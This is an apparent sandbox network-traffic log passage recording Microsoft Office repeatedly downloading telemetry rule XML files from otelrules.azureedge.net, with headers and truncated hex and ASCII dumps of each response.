                                                                                                                                                                                                2024-11-23 15:54:55 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:55 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                x-ms-request-id: a1d7de20-e01e-0051-6948-3c84b2000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155455Z-178bfbc474bwh9gmhC1NYCy3rs00000004n000000000nz2b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:55 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                137192.168.2.44997113.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:56 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:57 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1388
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                x-ms-request-id: 4c6a8f70-a01e-000d-057c-3bd1ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155457Z-174c587ffdfn4nhwhC1TEB2nbc000000037g00000000anh8
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:57 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                138192.168.2.44997213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:57 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:57 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                x-ms-request-id: 5431248a-601e-005c-155d-3df06f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155457Z-174c587ffdfmrvb9hC1TEBtn38000000034g00000000d4x6
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:57 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                139192.168.2.44997313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:57 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:57 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1378
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                                                x-ms-request-id: f92a0347-601e-005c-7f58-3cf06f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155457Z-15b8b599d88m7pn7hC1TEB4axw000000038g000000003s63
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:57 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                140192.168.2.44997413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:57 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:57 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:57 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1405
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                x-ms-request-id: 6d8f64b9-901e-005b-763b-3c2005000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155457Z-178bfbc474b9fdhphC1NYCac0n00000004h000000000g8sy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:57 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                141192.168.2.44997513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:57 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:57 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1368
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                                                x-ms-request-id: cd486f0a-401e-0048-5b49-3c0409000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155457Z-178bfbc474b7cbwqhC1NYC8z4n00000004hg00000000d35p
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:57 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                142192.168.2.44997613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:58 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:59 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                                                x-ms-request-id: afa98cfc-701e-003e-2a3c-3c79b3000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155459Z-178bfbc474bscnbchC1NYCe7eg00000004xg000000001spy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:59 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                143192.168.2.44997713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:59 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:59 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1378
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                x-ms-request-id: 8c2dcc7a-801e-0035-158c-3b752a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155459Z-174c587ffdfks6tlhC1TEBeza4000000035000000000hg94
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:59 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                144192.168.2.44997913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:59 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:55:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:59 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1397
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                x-ms-request-id: 814f5bec-201e-003f-7d43-3c6d94000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155459Z-178bfbc474bpnd5vhC1NYC4vr400000004hg00000000n7aq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:55:00 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                145192.168.2.44998013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:59 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:55:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:59 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1370
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                x-ms-request-id: 0ac0d454-901e-0015-334f-3cb284000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155459Z-15b8b599d882zv28hC1TEBdchn0000000320000000008577
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
